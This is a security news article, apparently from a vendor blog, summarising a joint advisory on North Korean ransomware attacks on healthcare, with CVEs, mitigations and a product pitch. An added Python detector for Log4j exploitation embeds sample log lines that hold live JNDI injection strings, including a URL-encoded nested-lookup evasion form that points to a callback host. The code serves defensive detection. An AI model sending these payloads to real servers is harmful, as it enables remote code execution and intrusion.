U.S. and South Korean cybersecurity and intelligence agencies warned in a joint advisory that North Korean hackers are launching ransomware attacks against healthcare and critical infrastructure facilities to fund illicit activities.
The attacks, which demand cryptocurrency ransoms in exchange for recovering access to encrypted files, are mainly designed to support North Korea’s objectives.
In their joint advisory, the authorities claim that the attacks include … cyber operations targeting the U.S. and South Korean governments — specific targets include Department of Defense Information Networks and Defense Industrial Base member networks.
The North Korean APT
For years, North Korean threat actors have been linked to espionage, financial theft, and cryptojacking operations, as well as to the WannaCry ransomware attack of 2017, which at the time was one of the most devastating cyber-attacks ever seen.
In 2022, North Korean hackers stole virtual assets estimated to be worth between $630 million and $1 billion, according to a new UN report, which said the increasingly sophisticated techniques are meant to gain access to digital networks involved in cyberfinance, as well as steal information from governments, companies, and individuals that could be useful in North Korea’s nuclear and ballistic missile programs.
As part of their attack chains, the hacker crew exploits known security flaws in Apache Log4j (CVE-2021-44228), SonicWall (CVE-2021-20038), and TerraMaster NAS appliances (CVE-2022-24990) to gain initial access, followed by reconnaissance, lateral movement, and ransomware deployment.
According to THN, the threat actors have also been observed using off-the-shelf tools such as BitLocker, DeadBolt, ech0raix, Jigsaw, and YourRansom to encrypt files, as well as impersonating other ransomware groups. The inclusion of DeadBolt and ech0raix marks the first time government agencies have formally tied these ransomware strains to a specific adversary.
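Defenders will want to know how the initial-access step shows up in their own telemetry. As an added example that is not part of the advisory or this article, the Python below flags web-server access-log lines carrying a Log4j JNDI lookup (the CVE-2021-44228 trigger), including URL-encoded and nested-lookup variants; the log lines are constructed, and the function names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format), not taken from the
# advisory: one benign request, one plain JNDI lookup in the User-Agent, and one
# URL-encoded request whose lookup is split with a nested ${lower:...} lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2023:08:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Feb/2023:08:02:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.12 - - [10/Feb/2023:08:03:05 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Adns%3A%2F%2F203.0.113.7%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
"""

# Log4j lookups that evaluate to a single character or to a default value are
# the usual way the literal string "jndi" is hidden from naive matching.
LOOKUP_CHAR = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]+)\}", re.IGNORECASE)


def normalize(text, rounds=5):
    """URL-decode and collapse nested lookups until the text stops changing."""
    for _ in range(rounds):
        previous = text
        text = unquote(text)
        text = LOOKUP_CHAR.sub(lambda m: m.group(1).lower(), text)
        text = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        if text == previous:
            break
    return text


def scan_log(log_text):
    """Return one record per line that carries a JNDI lookup after normalization."""
    hits = []
    for number, raw in enumerate(log_text.splitlines(), start=1):
        match = JNDI.search(normalize(raw))
        if match:
            hits.append({
                "line": number,
                "src": raw.split(" ", 1)[0],       # client address, first field
                "scheme": match.group(1).lower(),  # ldap, ldaps, rmi, dns, ...
                "target": match.group(2),          # host[:port]/path the lookup would contact
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['src']} -> {hit['scheme']}://{hit['target']}")
```

The `target` field is the callback host an attacker-controlled lookup would reach out to, so it is the value to pivot on when checking egress logs for actual outbound connections.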
An alternative method to distribute the malware is via trojanized files of a messenger app called X-Popup in attacks targeting small and medium-size hospitals in South Korea.
Mitigations
Among the mitigations recommended in the advisory, the authorities mentioned:
- Limit access to data by authenticating and encrypting connections, such as using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections.
- Implement the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts, which grant excessive system administration privileges.
- Turn off weak or unnecessary network device management interfaces, such as Telnet, SSH, Winbox, and HTTP on wide area networks (WANs), and secure them with strong passwords and encryption when they are enabled.
- Protect stored data by masking the permanent account number (PAN) when displayed and rendering it unreadable when stored—through cryptography, for example.
- Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
- Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
For more relevant steps, you can find the full report here.
Can Heimdal® Help You?
The answer is Yes! Heimdal's Ransomware Encryption Protection is universally compatible with any antivirus solution and 100% signature-free, ensuring superior detection and remediation of all types of ransomware.
A unified dashboard and agent ensure exceptional endpoint protection, monitoring, and response with all of our cybersecurity solutions.